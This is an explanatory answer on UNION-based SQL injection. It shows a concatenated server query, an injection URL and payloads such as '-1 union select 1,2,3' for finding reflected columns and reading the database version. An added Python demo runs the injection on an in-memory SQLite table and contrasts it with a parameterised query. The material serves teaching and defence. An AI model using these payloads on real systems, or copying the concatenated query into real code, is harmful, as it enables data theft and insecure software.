Let’s say on your server-side code, you have this code:
sql = "select id, title, description from artists where id = " + id
So using this injection:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3
Would result in SQL statement as below:
select id, title, description from artists where id= -1 union select 1,2,3
If on the client-side (UI), “2” and “3” are displayed in the “title” and “description” fields, then we can say that columns 2 and 3 of that table are vulnerable. That means that if we put “version()” in place of 2, like below:
select id, title, description from artists where id= -1 union select 1,version(),3
then in the “title” field, instead of “2”, we will receive the version value.
So basically, vulnerable columns are those that are exposed on the client-side (UI), where we can see the result of the injected code, for example the version in the code above.
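Added example (not from the original answer): a small, self-contained Python script using an in-memory SQLite table with the same column names as the page's artists table (the row contents are made up) that reproduces the concatenated query from the answer, shows which columns come back reflected after a UNION payload, and contrasts it with the parameterised query that defends against it. SQLite has no version() function, so the version step uses its equivalent sqlite_version(); the render() helper is an assumed stand-in for a UI that displays only title and description.

```python
import sqlite3


def make_db():
    # Constructed in-memory table standing in for the page's "artists" table.
    conn = sqlite3.connect(":memory:")
    conn.execute("create table artists (id integer, title text, description text)")
    conn.executemany(
        "insert into artists values (?, ?, ?)",
        [(1, "first artist", "first description"),
         (2, "second artist", "second description")],
    )
    return conn


def vulnerable_lookup(conn, artist):
    # Same string concatenation as the server-side snippet on the page:
    # whatever arrives in the request parameter is parsed as SQL.
    sql = "select id, title, description from artists where id = " + artist
    return conn.execute(sql).fetchall()


def safe_lookup(conn, artist):
    # Mitigation: bind the value as a parameter so it is never parsed as SQL.
    sql = "select id, title, description from artists where id = ?"
    return conn.execute(sql, (artist,)).fetchall()


def render(rows):
    # Assumed UI behaviour: only title and description are shown to the user,
    # which is why those are the columns the page calls "vulnerable".
    return [{"title": row[1], "description": row[2]} for row in rows]


def reflected_fields(rendered, markers=(2, 3)):
    # Which UI fields echo the UNION marker values? Those positions are the
    # ones an attacker can read data through; a defender should look for
    # exactly these echoes when reviewing request/response logs.
    return sorted(field for page in rendered for field, value in page.items() if value in markers)


if __name__ == "__main__":
    conn = make_db()
    payload = "-1 union select 1,2,3"
    print("concatenated:", render(vulnerable_lookup(conn, payload)))
    print("reflected fields:", reflected_fields(render(vulnerable_lookup(conn, payload))))
    print("version via title:", render(vulnerable_lookup(conn, "-1 union select 1,sqlite_version(),3")))
    print("parameterised:", render(safe_lookup(conn, payload)))
```

Running it shows the concatenated query returning the marker row (title 2, description 3) and then the database version in the title field, while the parameterised query returns nothing for the same input because the whole string is compared against id as a single value.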